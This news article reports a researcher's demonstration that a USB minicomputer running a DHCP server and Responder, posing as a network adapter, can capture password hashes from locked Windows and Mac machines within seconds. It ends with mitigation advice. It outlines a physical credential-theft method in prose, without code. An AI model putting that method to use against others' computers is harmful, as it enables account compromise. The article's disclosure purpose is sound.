This one-minute, £40 USB hack could steal all your passwords from a locked computer

If you think a strong password and a locked screen can protect your computer from being compromised – think again. In a hack that works on both Windows and Mac, a security researcher has shown how cheap hardware can be used to steal private credentials in well under a minute.

Rob "Mubix" Fuller, principal security engineer at R5 Industries, tested a technique using a selection of USB-mounted minicomputers that run the Linux operating system including the USB Armory ($155, £115) and the Hak5 Turtle ($50, £38).

He found, as outlined in an in-depth blog post, that once physically at a computer these devices can be programmed to obtain account passwords from locked systems which can then later be cracked and exploited.

Fuller tested the technique on Windows 98, 2000, XP, 7 and 10 alongside OSX El Capitan / Mavericks. He said he was able to obtain the Mac credentials however further testing is needed to find out if it was "a fluke."

Ultimately, the hack works because most computers will automatically install these plug-and-play USB devices without question, he said.

"Even if a system is locked out, the device still gets installed. There are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems [...] but Ethernet/LAN is definitely on the white list."

While an attacker would need to physically be at a computer for the hack to work, Fuller said that the average time for the process to take place – depending on the operating system – can be as little as 13 seconds. "This is dead simple and shouldn't work, but it does. Also, there is no possible way that I'm the first one that has identified this," he said.

For those wanting to see the hack in action, Fuller recorded the process and uploaded it to YouTube. In an email to Ars Technica, he gave a more technical explanation what how the process is taking place.

He said: "What is happening in the video, is the USB Armory is being plugged into a locked (but logged in) system. It boots up via the USB power, and starts up a DHCP server, and Responder. While it's doing this, the victim is recognising it as an Ethernet adapter.

"The victim then makes route decisions and starts sending the traffic it was already creating to the Armory instead of the 'real' network connection.

"Responder does its job and responds to all kinds of services asking for authentication, and since most OSs treat their local network as 'trusted' it sees the authentication request and automatically authenticates. Seeing that the database of Responder has been modified the Armory shuts down (LED goes solid)."

For anyone concerned, Fuller has pointed to one mitigation technique that appears to work and said he will produce follow-up research about how to prevent hackers exploiting this security vulnerability. In the meantime, he offered some friendly advice on Twitter: "Don't leave your workstation logged in, especially overnight, unattended, even if you lock the screen."